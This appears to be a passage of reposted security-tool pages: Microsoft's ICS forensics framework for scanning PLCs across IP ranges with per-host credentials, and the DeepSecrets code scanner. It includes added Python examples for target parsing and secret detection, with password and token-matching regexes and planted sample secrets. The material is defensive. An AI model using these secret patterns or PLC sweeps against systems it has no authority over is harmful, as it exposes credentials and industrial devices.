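    outcomes: Dict[str, Dict[str, str]] = {}
    return {
        name: summarize_outcome(name, checks[name].run(directory), outcomes)
        for name in compatibility_matrix["new_type"]
    }


def demo() -> Dict[str, str]:
    """Scan two constructed IaC directories: one clean, one with an embedded password."""
    clean = tempfile.mkdtemp()
    Path(clean, "main.tf").write_text('variable "region" { default = "eu-west-1" }\n')
    dirty = tempfile.mkdtemp()
    Path(dirty, "db.tf").write_text('password = "constructed-example-value"\n')
    return {"clean": scan_directory(clean)["new_tool"], "dirty": scan_directory(dirty)["new_tool"]}


if __name__ == "__main__":
    print(demo())
```

The point of keeping Step 4 as a string search on the tool's raw output, as the page prescribes, is that the check class never has to know the summarizer's status vocabulary ("Passed" / "Problems"); in the real service the branch lives inside ResultsSummary.summarize_outcome and writes to self.outcomes rather than to the dictionary passed in here.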

Source: KitPloit
ICS-Forensics-Tools - Microsoft ICS Forensics Framework
Microsoft ICS Forensics Tools is an open source forensic framework for analyzing industrial PLC metadata and project files. It enables investigators to identify suspicious artifacts in ICS environments and to detect compromised devices during incident response or manual checks. Being open source, the framework allows investigators to verify the actions of the tool or customize it to specific needs.

Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    git clone https://github.com/microsoft/ics-forensics-tools.git

Prerequisites

Install Python >= 3.9: https://www.python.org/downloads

Installing

Install the Python requirements:

    pip install -r requirements.txt

Usage

General application arguments:

Args | Description | Required / Optional
-h, --help | show this help message and exit | Optional
-s, --save-config | Save config file for easy future usage | Optional
-c, --config | Config file path, default is config.json | Optional
-o, --output-dir | Directory in which to output any generated files, default is output | Optional
-v, --verbose | Log output to a file as well as the console | Optional
-p, --multiprocess | Run in multiprocess mode by number of plugins/analyzers | Optional

Specific plugin arguments:

Args | Description | Required / Optional
-h, --help | show this help message and exit | Optional
--ip | Addresses file path, CIDR or IP addresses csv (ip column required). Add more columns for additional info about each ip (username, pass, etc...) | Required
--port | Port number | Optional
--transport | tcp/udp | Optional
--analyzer | Analyzer name to run | Optional

Executing examples in the command line:

    python driver.py -s -v PluginName --ip ips.csv
    python driver.py -s -v PluginName --analyzer AnalyzerName
    python driver.py -s -v -c config.json --multiprocess

Import as library example:

    from forensic.client.forensic_client import ForensicClient
    from forensic.interfaces.plugin import PluginConfig

    forensic = ForensicClient()
    plugin = PluginConfig.from_json({
        "name": "PluginName",
        "port": 123,
        "transport": "tcp",
        "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
        "parameters": {},
        "analyzers": []
    })
    forensic.scan([plugin])

Architecture

Adding Plugins

When developing locally, make sure to mark the src folder as "Sources root".
Create a new directory under the plugins folder with your plugin name.
Create a new Python file with your plugin name.
Use the following template to write your plugin and replace 'General' with your plugin name:

    from pathlib import Path
    from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
    from forensic.common.constants.constants import Transport


    class GeneralCLI(PluginCLI):
        def __init__(self, folder_name):
            super().__init__(folder_name)
            self.name = "General"
            self.description = "General Plugin Description"
            self.port = 123
            self.transport = Transport.TCP

        def flags(self, parser):
            self.base_flags(parser, self.port, self.transport)
            parser.add_argument('--general', help='General additional argument', metavar="")


    class General(PluginInterface):
        def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
            super().__init__(config, output_dir, verbose)

        def connect(self, address):
            self.logger.info(f"{self.config.name} connect")

        def export(self, extracted):
            self.logger.info(f"{self.config.name} export")

Make sure to import your new plugin in the __init__.py file under the plugins folder.

The class inherited from PluginInterface has a 'config' attribute; use it to access any data available in the PluginConfig object (plugin name, addresses, port, transport, parameters). There are two mandatory functions, connect and export. The connect function receives a single IP address, extracts any relevant information from the device and returns it. The export function receives the information extracted from all the devices; there you can export it to a file. In the class inherited from PluginCLI you specify, in the init function, the default information related to this plugin. It has a single mandatory function, flags, in which you must call base_flags; you can add any additional flags you want.

Adding Analyzers

Create a new directory under the analyzers folder with the name of the plugin related to your analyzer.
Create a new Python file with your analyzer name.
Use the following template to write your analyzer and replace 'General' with your analyzer name:

    from pathlib import Path
    from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


    class General(AnalyzerInterface):
        def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
            super().__init__(config, output_dir, verbose)
            self.plugin_name = 'General'
            self.create_output_dir(self.plugin_name)

        def analyze(self):
            pass

Make sure to import your new analyzer in the __init__.py file under the analyzers folder.

Resources and Technical data & solution:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.
Section 52 under MSRC blog
ICS lecture given about the tool: Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

Contributing

This project welcomes contributions and suggestions.
Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com. When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA. This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties' policies.

Download Ics-Forensics-Tools
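The --ip argument and the addresses list passed to PluginConfig.from_json above describe the same target format: a single IP, a CIDR, or a CSV with a required ip column and optional extra columns per host. The following is an added example, not code from the ics-forensics-tools repository, of parsing those three forms into the address dicts that from_json call takes; the function names, the MAX_HOSTS cap and the sample CSV are assumptions of this example, and to_plugin_config only mirrors the shape of the README's from_json argument.

```python
import csv
import io
import ipaddress
import os
from typing import Dict, List

MAX_HOSTS = 4096  # assumption: refuse to expand an accidental 10.0.0.0/8 into a target list

# Constructed sample of the CSV form: 'ip' is the only required column; any other
# column (username, pass, site, ...) is carried along with each expanded address.
SAMPLE_CSV = """ip,username,site
192.168.1.0/30,eng,plant-a
10.10.10.10,,plant-b
"""


def expand_targets(spec: str) -> List[str]:
    """Turn a single IP or a CIDR into the list of host addresses to contact.
    strict=False accepts '192.168.1.5/24' (host bits set) the way operators type it."""
    network = ipaddress.ip_network(spec.strip(), strict=False)
    if network.num_addresses > MAX_HOSTS:
        raise ValueError(f"{spec} expands to {network.num_addresses} hosts (limit {MAX_HOSTS})")
    if network.num_addresses <= 2:
        # /32 and /31 (or /128 and /127): every address is a host, independent of
        # how this Python version's hosts() treats tiny networks.
        return [str(a) for a in network]
    # Larger networks: skip the network and broadcast addresses.
    return [str(h) for h in network.hosts()]


def parse_csv(text: str) -> List[Dict[str, str]]:
    """CSV body with a required 'ip' column; CIDRs in that column are expanded and
    the remaining non-empty columns are attached to every resulting address."""
    reader = csv.DictReader(io.StringIO(text))
    if reader.fieldnames is None or "ip" not in reader.fieldnames:
        raise ValueError("addresses csv must have an 'ip' column")
    rows: List[Dict[str, str]] = []
    for row in reader:
        extra = {k: v.strip() for k, v in row.items() if k != "ip" and v and v.strip()}
        for host in expand_targets(row["ip"]):
            rows.append({"ip": host, **extra})
    return rows


def load_addresses(arg: str) -> List[Dict[str, str]]:
    """Resolve the --ip argument: a CSV file path, or a CIDR / single IP literal."""
    if os.path.isfile(arg):
        with open(arg, encoding="utf-8") as fh:
            return parse_csv(fh.read())
    return [{"ip": host} for host in expand_targets(arg)]


def to_plugin_config(name: str, port: int, transport: str,
                     addresses: List[Dict[str, str]]) -> Dict[str, object]:
    """Build the dict shape the README's PluginConfig.from_json example takes."""
    if transport not in ("tcp", "udp"):
        raise ValueError("transport must be tcp or udp")
    return {"name": name, "port": port, "transport": transport,
            "addresses": addresses, "parameters": {}, "analyzers": []}
```

Expanding a CIDR up front, rather than handing the network to each plugin, makes the extra per-host columns (credentials, site) line up with the single address that connect() receives, and the host cap keeps a mistyped prefix from turning a PLC triage into a network-wide sweep.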
Deepsecrets - Secrets Scanner That Understands Code
Yet another tool - why?

Existing tools don't really "understand" code. Instead, they mostly parse text. DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous-variable detection, and more efficient use of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing, techniques commonly used in SAST tools. DeepSecrets also introduces a new way to find secrets: supply hashed values of your known secrets and have them found, in plain form, in your code. The story under the hood is told in articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem

Mini-FAQ after release :)

Pff, is it still regex-based?
Yes and no. Of course it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes are an instrument, not a problem.

Why don't you build true abstract syntax trees? It's academically more correct!
DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply overkill for this specific task. So the tool still follows the generic SAST way of code analysis but optimizes the AST part using a different approach.

I'd like to build my own semantic rules. How do I do that?
Only through the code at the moment. Formalizing the rules and moving them into a flexible, user-controlled ruleset is in the plans.

I still have a question
Feel free to communicate with the maintainer.

Installation

From GitHub via pip:

    $ pip install git+https://github.com/avito-tech/deepsecrets.git

From PyPI:

    $ pip install deepsecrets

Scanning

The easiest way:

    $ deepsecrets --target-dir /path/to/your/code --outfile report.json

This will run a scan against /path/to/your/code using the default configuration:
- Regex checks by the built-in ruleset
- Semantic checks (variable detection, entropy checks)
The report will be saved to report.json.

Fine-tuning

Run deepsecrets --help for details. Basically, you can use your own ruleset by specifying --regex-rules. Paths to be excluded from scanning can be set via --excluded-paths.

Building rulesets

Regex: The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset.

HashedSecret: a ruleset of hashed known secrets follows the same approach. Use the built-in rulesets under /deepsecrets/rules/ as a reference for the format and create your own; it holds hashes of your secrets rather than the secrets themselves.

Contributing

Under the hood

There are several core concepts: File, Tokenizer, Token, Engine, Finding, ScanMode.

File: Just a pythonic representation of a file with all the methods needed to manage it.

Tokenizer: A component able to break the content of a file into pieces, Tokens, by its own logic. Three tokenizers are available:
FullContentTokenizer: treats all content as a single token. Useful for regex-based search.
PerWordTokenizer: breaks the given content by words and line breaks.
LexerTokenizer: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.

Token: A string with additional information about its semantic role, its file, and its location inside that file.

Engine: A component performing the secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:
RegexEngine: checks tokens' values against a special ruleset.
SemanticEngine: checks tokens produced by the LexerTokenizer using additional context, namely variable names and values.
HashedSecretEngine: checks tokens' values by hashing them and looking for matching hashes in a special ruleset.

Finding: A data structure representing a problem detected inside code. It carries the precise location inside a file and the rule that found it.

ScanMode: The component responsible for the scan process. It defines the scope of analysis for a given work directory, respecting exclusions; declares a PerFileAnalyzer, the method called against each file that returns a list of findings (its primary job is to initialize the necessary engines, tokenizers, and rulesets); runs the scan, with a multiprocessing pool analyzing every file in parallel; and prepares the results for output and outputs them. The current implementation has a CliScanMode built from the user-provided config through the CLI args.

Local development

The project is supposed to be developed using VSCode and the 'Remote Containers' feature. Steps:
Clone the repository.
Open the cloned folder with VSCode.
Agree to 'Reopen in container'.
Wait until the container is built and the necessary extensions are installed.
You're ready.

Download Deepsecrets
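The tokenizer, engine and finding concepts above, together with the hashed-secret feature described at the top of the section, as an added example that is not DeepSecrets' own code: a per-word tokenizer and a toy assignment lexer, a semantic engine that flags secret-looking variable names holding long, high-entropy literals, and a hashed-secret engine that looks up the sha256 digest of every token, so a ruleset of known secrets never contains the secrets themselves. The class names, regexes, thresholds and the sample source file are assumptions of this example; DeepSecrets' actual Token, Finding and Engine classes, its rulesets and its lexers are not used here.

```python
import hashlib
import math
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample file (not from the project or its test data).
SAMPLE_SOURCE = '''\
import os

DB_HOST = "db.internal"
db_password = "Tr0ub4dor&3-xyz-9921"   # hard-coded, high-entropy literal
API_TOKEN = os.environ["API_TOKEN"]     # read from the environment: fine
legacy_key = "hunter2"                  # a known, already-leaked value
'''


@dataclass(frozen=True)
class Token:
    value: str
    line: int
    column: int
    variable: Optional[str] = None  # name it is assigned to, when the lexer knows


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int
    column: int
    value: str


WORD_RE = re.compile(r"""[^\s"'=,;()\[\]{}]+""")
ASSIGN_RE = re.compile(r"""^\s*([A-Za-z_]\w*)\s*=\s*["']([^"']*)["']""")
DANGEROUS_NAME_RE = re.compile(r"(pass(word|wd)?|secret|token|api_?key|_key)$", re.I)


def per_word_tokens(text: str) -> List[Token]:
    """PerWordTokenizer-style split: every word of every line, with its position."""
    return [Token(m.group(0), n, m.start() + 1)
            for n, line in enumerate(text.splitlines(), 1)
            for m in WORD_RE.finditer(line)]


def assignment_tokens(text: str) -> List[Token]:
    """A toy stand-in for the LexerTokenizer: only string literals assigned to a
    variable, carrying the variable name as context for the semantic engine."""
    tokens = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ASSIGN_RE.match(line)
        if m:
            tokens.append(Token(m.group(2), n, m.start(2) + 1, variable=m.group(1)))
    return tokens


def shannon_entropy(s: str) -> float:
    """Bits per character: about 4.0 for the 20-char literal above, 2.81 for 'hunter2'."""
    if not s:
        return 0.0
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def semantic_engine(token: Token, min_len: int = 8, min_entropy: float = 3.0) -> List[Finding]:
    """Dangerous-variable detection: a secret-looking name holding a long, high-entropy literal."""
    if (token.variable and DANGEROUS_NAME_RE.search(token.variable)
            and len(token.value) >= min_len and shannon_entropy(token.value) >= min_entropy):
        return [Finding("semantic:dangerous-variable", token.line, token.column, token.value)]
    return []


def build_hashed_ruleset(known_secrets: Dict[str, str]) -> Dict[str, str]:
    """Done once, offline, by whoever owns the secrets: only sha256 digests are shared."""
    return {hashlib.sha256(plain.encode()).hexdigest(): label
            for plain, label in known_secrets.items()}


def hashed_secret_engine(token: Token, ruleset: Dict[str, str]) -> List[Finding]:
    """Hash every token and look the digest up; the ruleset never holds the plaintext."""
    digest = hashlib.sha256(token.value.encode()).hexdigest()
    if digest in ruleset:
        return [Finding("hashed-secret:" + ruleset[digest], token.line, token.column, token.value)]
    return []


def scan(text: str, hashed_ruleset: Dict[str, str]) -> List[Finding]:
    """Run each engine over its tokenizer's output and return deduplicated findings."""
    findings = set()
    for tok in per_word_tokens(text):
        findings.update(hashed_secret_engine(tok, hashed_ruleset))
    for tok in assignment_tokens(text):
        findings.update(semantic_engine(tok))
    return sorted(findings, key=lambda f: (f.line, f.column))
```

Findings carry the matched value so the reader can see what fired; a real report should redact or hash it before it is written to report.json, otherwise the scanner's own output becomes another copy of the secret.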
